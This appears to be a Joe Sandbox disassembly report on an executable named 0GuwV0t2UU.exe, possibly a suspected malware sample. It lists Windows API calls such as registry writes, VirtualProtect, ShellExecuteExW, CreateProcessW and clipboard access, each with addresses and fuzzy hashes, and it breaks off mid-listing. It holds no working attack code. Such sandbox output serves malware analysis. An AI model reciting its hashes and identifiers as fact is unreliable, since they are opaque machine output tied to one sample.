                                                      • API String ID: 390214022-0
                                                      • Opcode ID: cc309e7f02997b5e016163de44fe3fdddd8bf4d3fe64c06df27e2bc62d43203d
                                                      • Instruction ID: ca2f62041d63e4abf833ada0eb3473e8090594299762c22e2e4a91b8788c92d6
                                                      • Opcode Fuzzy Hash: cc309e7f02997b5e016163de44fe3fdddd8bf4d3fe64c06df27e2bc62d43203d
                                                      • Instruction Fuzzy Hash: CEE086319105266BDB103AF20ECE9BE2058AF48308B24093FF512B61C2DEFC8C42567D
                                                      APIs
                                                      • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E7C,00000000,?,?), ref: 00406566
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: Create
                                                      • String ID:
                                                      • API String ID: 2289755597-0
                                                      • Opcode ID: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                                      • Instruction ID: cfc89692b4771faa31f3440cbcbb3328f2b21d62788620711c29387ee39994bc
                                                      • Opcode Fuzzy Hash: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                                      • Instruction Fuzzy Hash: 94E0BFB2010109BEEF095F50EC0AD7F371DE708210F11452EF946D5051E6B5A9309674
                                                      APIs
                                                      • WriteFile.KERNELBASE(00008001,00000000,00000000,00000000,00000000,0041441E,0040CEF0,0040359E,0040CEF0,0041441E,00414EF0,00004000,?,00000000,004033C8,00000004), ref: 00406258
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: FileWrite
                                                      • String ID:
                                                      • API String ID: 3934441357-0
                                                      • Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                      • Instruction ID: 50ccb5e768420c5b79bdfebb9096a84dabe54a6ff5c0a4120d9a71b85527c923
                                                      • Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                      • Instruction Fuzzy Hash: FDE08C3221821AABCF10BE608C00EEB3B6CEB017A0F02447AFD56E3050D231E83097A8
                                                      APIs
                                                      • ReadFile.KERNELBASE(00008001,00000000,00000000,00000000,00000000,00414EF0,0040CEF0,0040361A,00008001,00008001,0040351E,00414EF0,00004000,?,00000000,004033C8), ref: 00406229
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID:
                                                      • API String ID: 2738559852-0
                                                      • Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                      • Instruction ID: fbac330590941eb325162a4ee9bfa4b3c7313c609e27a1dd4f64d068a4d06545
                                                      • Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                      • Instruction Fuzzy Hash: 8FE08632110129ABCF106E549C00EEB375CEF05350F014876F951E3040D730E83187A5
                                                      APIs
                                                      • VirtualProtect.KERNELBASE(6E9F505C,00000004,00000040,6E9F504C), ref: 6E9F2A9D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2450949235.000000006E9F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6E9F0000, based on PE: true
                                                      • Associated: 00000000.00000002.2450757132.000000006E9F0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000000.00000002.2451038784.000000006E9F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000000.00000002.2451083781.000000006E9F6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6e9f0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      • Opcode ID: 2ae3a97bf87e79b360bf9bbaea2e4d449459af72c26730dcf31644520c4be362
                                                      • Instruction ID: b2ee213588df2abe2b918315663bb83327ad390cfd50f3ac42fb7f6f8a00adc0
                                                      • Opcode Fuzzy Hash: 2ae3a97bf87e79b360bf9bbaea2e4d449459af72c26730dcf31644520c4be362
                                                      • Instruction Fuzzy Hash: 28F092F1548A80EECB50CF68A444B193FE0BF4A304F1DC52AE14ED6240E3348C45CF95
                                                      APIs
                                                      • RegOpenKeyExW.KERNELBASE(00000000,00421F28,00000000,00000000,?,?,00000000,?,0040659D,?,00421F28,?,?,Call,?,00000000), ref: 00406533
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: Open
                                                      • String ID:
                                                      • API String ID: 71445658-0
                                                      • Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                      • Instruction ID: f918e5a98cb24a054262289ed7dc727aaea68e18f53d3a7cb50250e03803467c
                                                      • Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                      • Instruction Fuzzy Hash: 49D0127200020DBBDF119E90AD01FAB3B1DEB08750F014826FE06A4090D775D530A759
                                                      APIs
                                                      • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015D3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: AttributesFile
                                                      • String ID:
                                                      • API String ID: 3188754299-0
                                                      • Opcode ID: 572cf4c90763d6db3aff343bf159b9c25ae8d936e0376a9b09b46d4b6c1cb919
                                                      • Instruction ID: 5cf9fff7ca003f7de6e06da3139910a687e7d5fc9395db2f8314fc67efe03c30
                                                      • Opcode Fuzzy Hash: 572cf4c90763d6db3aff343bf159b9c25ae8d936e0376a9b09b46d4b6c1cb919
                                                      • Instruction Fuzzy Hash: BFD05B72B08201D7DB00DBE89B48A9F77609B10368F30853BD111F11D4D6B8C945A71D
                                                      APIs
                                                      • SendMessageW.USER32(00000028,?,00000001,00404481), ref: 00404664
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID:
                                                      • API String ID: 3850602802-0
                                                      • Opcode ID: 7b4bfb7d8a9e2d5081e5309f0fc6290f036d11fbecd93854b33ee848cd02fe6a
                                                      • Instruction ID: d5eb2a856a333d3101ae379727e71f2b9456d74e3cdd14bb02a2274a242f0d94
                                                      • Opcode Fuzzy Hash: 7b4bfb7d8a9e2d5081e5309f0fc6290f036d11fbecd93854b33ee848cd02fe6a
                                                      • Instruction Fuzzy Hash: 7DB09235280640AADE215B00DE09F867B66A7A4701F008438B240640B0CAB204A1DB08
                                                      APIs
                                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040331B,?), ref: 0040362B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: FilePointer
                                                      • String ID:
                                                      • API String ID: 973152223-0
                                                      • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                      • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                                      • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                      • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                                      APIs
                                                      • ShellExecuteExW.SHELL32(?), ref: 00405CD7
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: ExecuteShell
                                                      • String ID:
                                                      • API String ID: 587946157-0
                                                      • Opcode ID: accb29398adcd6f2598047f0fcddae8b07494e52d9cc9fcafc25c5f5f83f3143
                                                      • Instruction ID: 080962bbef7e268e86b0d243ececfcd1ad47764945baea7f73af6130fa7b9bd6
                                                      • Opcode Fuzzy Hash: accb29398adcd6f2598047f0fcddae8b07494e52d9cc9fcafc25c5f5f83f3143
                                                      • Instruction Fuzzy Hash: A9C092F2100201EFE301CF80CB09F067BE8AF54306F028058E1899A060CB788800CB29
                                                      APIs
                                                        • Part of subcall function 00405727: lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000,?), ref: 0040575F
                                                        • Part of subcall function 00405727: lstrlenW.KERNEL32(004030CD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000), ref: 0040576F
                                                        • Part of subcall function 00405727: lstrcatW.KERNEL32(00421F28,004030CD,004030CD,00421F28,00000000,00000000,00000000), ref: 00405782
                                                        • Part of subcall function 00405727: SetWindowTextW.USER32(00421F28,00421F28), ref: 00405794
                                                        • Part of subcall function 00405727: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057BA
                                                        • Part of subcall function 00405727: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057D4
                                                        • Part of subcall function 00405727: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057E2
                                                        • Part of subcall function 00405C85: CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F50,?,?,?,0042C800,?), ref: 00405CAE
                                                        • Part of subcall function 00405C85: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405CBB
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00402010
                                                        • Part of subcall function 00406B41: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406B52
                                                        • Part of subcall function 00406B41: GetExitCodeProcess.KERNEL32(?,?), ref: 00406B74
                                                        • Part of subcall function 004065E9: wsprintfW.USER32 ref: 004065F6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                      • String ID:
                                                      • API String ID: 2972824698-0
                                                      • Opcode ID: f60794d5ae17b526ad38acc56fd487baa7bb5126cb0446607b1cbff469675112
                                                      • Instruction ID: 5ec8f1ba08e9840dea923bca67266c83376547b269141edce926560ea608d087
                                                      • Opcode Fuzzy Hash: f60794d5ae17b526ad38acc56fd487baa7bb5126cb0446607b1cbff469675112
                                                      • Instruction Fuzzy Hash: 7AF09C31904615DBEF20BB655AC95DE7665DF00318F11413FE202B21D5CABC4D41A75D
                                                      APIs
                                                      • GetDlgItem.USER32(?,00000403), ref: 004058C4
                                                      • GetDlgItem.USER32(?,000003EE), ref: 004058D3
                                                      • GetClientRect.USER32(?,?), ref: 00405910
                                                      • GetSystemMetrics.USER32(00000002), ref: 00405917
                                                      • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405938
                                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405949
                                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040595C
                                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040596A
                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040597D
                                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040599F
                                                      • ShowWindow.USER32(?,00000008), ref: 004059B3
                                                      • GetDlgItem.USER32(?,000003EC), ref: 004059D4
                                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004059E4
                                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059FD
                                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405A09
                                                      • GetDlgItem.USER32(?,000003F8), ref: 004058E2
                                                        • Part of subcall function 00404656: SendMessageW.USER32(00000028,?,00000001,00404481), ref: 00404664
                                                      • GetDlgItem.USER32(?,000003EC), ref: 00405A26
                                                      • CreateThread.KERNEL32(00000000,00000000,Function_000057FA,00000000), ref: 00405A34
                                                      • CloseHandle.KERNEL32(00000000), ref: 00405A3B
                                                      • ShowWindow.USER32(00000000), ref: 00405A5F
                                                      • ShowWindow.USER32(?,00000008), ref: 00405A64
                                                      • ShowWindow.USER32(00000008), ref: 00405AAE
                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405AE2
                                                      • CreatePopupMenu.USER32 ref: 00405AF3
                                                      • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405B07
                                                      • GetWindowRect.USER32(?,?), ref: 00405B27
                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405B40
                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B78
                                                      • OpenClipboard.USER32(00000000), ref: 00405B88
                                                      • EmptyClipboard.USER32 ref: 00405B8E
                                                      • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B9A
                                                      • GlobalLock.KERNEL32(00000000), ref: 00405BA4
                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405BB8
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00405BD8
                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 00405BE3
                                                      • CloseClipboard.USER32 ref: 00405BE9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                      • String ID: H/B${
                                                      • API String ID: 590372296-332483393
                                                      • Opcode ID: b4ac37d96ff1ca46bd369c895d54e34b2496975cf73faa18766466022b69d915
                                                      • Instruction ID: 26959a90f0a266772171a70e0d2c3eddd0d3dcd8a9821819e75e01dae6d4cf8f
                                                      • Opcode Fuzzy Hash: b4ac37d96ff1ca46bd369c895d54e34b2496975cf73faa18766466022b69d915
                                                      • Instruction Fuzzy Hash: 1EB158B0900608FFEB11AF60DD859AE7B79FB08354F00413AFA45BA1A0CB785E51DF68
                                                      APIs
                                                      • GetDlgItem.USER32(?,000003FB), ref: 00404B61
                                                      • SetWindowTextW.USER32(00000000,?), ref: 00404B8B
                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00404C3C
                                                      • CoTaskMemFree.OLE32(00000000), ref: 00404C47
                                                      • lstrcmpiW.KERNEL32(Call,00422F48,00000000,?,?), ref: 00404C79
                                                      • lstrcatW.KERNEL32(?,Call), ref: 00404C85
                                                      • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404C97
                                                        • Part of subcall function 00405CE6: GetDlgItemTextW.USER32(?,?,00000400,00404CCE), ref: 00405CF9
                                                        • Part of subcall function 00406950: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\0GuwV0t2UU.exe",75573420,C:\Users\user\AppData\Local\Temp\,00000000,00403640,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040394F,?,00000008,0000000A,0000000C), ref: 004069B3
                                                        • Part of subcall function 00406950: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004069C2
                                                        • Part of subcall function 00406950: CharNextW.USER32(?,"C:\Users\user\Desktop\0GuwV0t2UU.exe",75573420,C:\Users\user\AppData\Local\Temp\,00000000,00403640,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040394F,?,00000008,0000000A,0000000C), ref: 004069C7
